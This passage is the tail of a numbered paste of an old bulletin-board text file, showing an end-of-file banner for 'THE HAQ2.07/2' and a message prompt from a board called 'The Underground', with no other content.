  775. -=-=-=-=-=-=-=-=-=-=-=-=-=- END of THE HAQ2.07/2 -=-=-=-=-=-=-=-=-=-=-=-
  776.  
  777. [The Underground> msg #24066 (49 remaining)] Read cmd -> Next
  778.  
  779.